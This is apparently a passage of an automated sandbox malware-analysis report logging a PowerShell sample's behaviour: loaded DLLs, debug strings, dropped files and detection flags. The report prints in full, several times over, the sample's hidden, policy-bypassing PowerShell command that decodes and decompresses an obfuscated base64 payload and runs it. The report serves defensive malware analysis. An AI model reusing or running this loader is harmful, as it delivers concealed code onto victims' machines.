Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbR] source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbt\ source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbc~ source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbA source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdb source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbl source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdbhP source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMy
Obfuscated command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))" Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))" Jump to behavior
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9BAD8167 push ebx; ret 0_2_00007FFD9BAD816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC4845 pushad ; retf 4_2_00007FFD9BAC4849
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC476C push ebp; iretd 4_2_00007FFD9BAC477A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC6695 pushfd ; iretd 4_2_00007FFD9BAC66AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC469C push ecx; iretd 4_2_00007FFD9BAC46AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC46AC push ebx; iretd 4_2_00007FFD9BAC46DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC460C push ecx; iretd 4_2_00007FFD9BAC460D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC4645 push ecx; iretd 4_2_00007FFD9BAC4646
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC4585 push ecx; iretd 4_2_00007FFD9BAC45DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC45CC push ecx; iretd 4_2_00007FFD9BAC45DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC28F2 push ebp; retf 4_2_00007FFD9BAC290A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC2925 push edi; retf 4_2_00007FFD9BAC294A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC28BC push ebx; retf 4_2_00007FFD9BAC28EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC28AC push eax; retf 4_2_00007FFD9BAC28BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BB90D6C push eax; ret 4_2_00007FFD9BB90D6D
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
